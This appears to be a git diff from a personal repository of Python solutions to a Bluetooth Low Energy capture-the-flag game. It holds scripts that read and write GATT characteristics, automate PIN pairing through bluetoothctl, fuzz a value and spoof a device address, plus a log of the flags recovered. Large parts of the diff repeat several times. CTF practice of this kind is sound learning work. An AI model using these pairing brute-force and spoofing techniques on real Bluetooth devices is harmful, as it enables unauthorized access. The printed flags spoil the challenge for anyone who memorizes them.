\d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py new file mode 100644 index 0000000..8f3a108 --- /dev/null +++ b/lvl_09_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Im advertising the flag + +''' diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py new file mode 100644 index 0000000..8f3a108 --- /dev/null +++ b/lvl_09_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Im advertising the flag + +''' diff --git a/notes.txt b/notes.txt index 71efc09..ed1bbbf 100644 --- a/notes.txt +++ b/notes.txt @@ -1,4 +1,11 @@ +Setup: + $> rfkill unblock all + $> btmgmt le on + $> systemctl start bluetooth + $> hciconfig hci0 up + $> hciconfig hci0 reset + $> hcitool lescan Search for MAC addresses around: hcitool lescan enumerate the MAC - bleah -b 11:22:33:44:55:66 -e \ No newline at end of file + bleah -b 11:22:33:44:55:66 -e diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py new file mode 100644 index 0000000..8f3a108 --- /dev/null +++ b/lvl_09_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Im advertising the flag + +''' diff --git a/notes.txt b/notes.txt index 71efc09..ed1bbbf 100644 --- a/notes.txt +++ b/notes.txt @@ -1,4 +1,11 @@ +Setup: + $> rfkill unblock all + $> btmgmt le on + $> systemctl start bluetooth + $> hciconfig hci0 up + $> hciconfig hci0 reset + $> hcitool lescan Search for MAC addresses around: hcitool lescan enumerate the MAC - bleah -b 11:22:33:44:55:66 -e \ No newline at end of file + bleah -b 11:22:33:44:55:66 -e diff --git a/solutions.txt b/solutions.txt new file mode 100644 index 0000000..e407ed4 --- /dev/null +++ b/solutions.txt @@ -0,0 +1,64 @@ +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_00.py +Attached to peripheral +Sending "12345678901234567890" to 0x2e +Done + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_01.py +Attached to peripheral +Loading level 1 +Reading value +Flag: eca7d1f3cf60a8b5344a + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_02.py +Attached to peripheral +Loading level 02 +Password Found: password1234 +Flag: eca7d1f3cf60a8b5344a + +/*** + * nano /etc/systemd/system/dbus-org.bluez.service + * set: ExecStart=/usr/lib/bluetooth/bluetoothd --compat + */ +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# systemctl daemon-reload +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# service bluetooth restart +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_03.py +Attached to peripheral +Loading level 03 +Pairing +Attached to peripheral (pid 0) +Sending PIN: 0000 +Flag: b46fa238cf820d0f60c1 +Pairing successful + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_04.py +Attached to peripheral +Loading level 04 +Generating wordlist +Trying: AABBC8DDEEFF +Flag: f401f21d02fdd0a4fc00 + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_05.py +Attached to peripheral +Loading level 05 +Sending "121212121222" to 0x2c +Reading value +Flag: 84cf61c35b2d9c92217d + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_06.py +Attached to peripheral +Loading level 06 +Manufacturer: Cypress Semiconductor Corporation (305) +Device address: B8:27:EB:81:86:56 (Raspberry Pi Foundation) +New BD address: 11:22:33:44:55:66 +Address changed - Reset device now +Reading value +Flag: 1dec0e624f2ecf1513dc + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_07.py +[bp] Attached to peripheral +[++] Loading level 07 +[sp] starting bluetoothctl +[sp] Timeout +[sp] Pairing successful +[bp] Attached to peripheral +[==] Flag: a16ee1a4001c66c3a670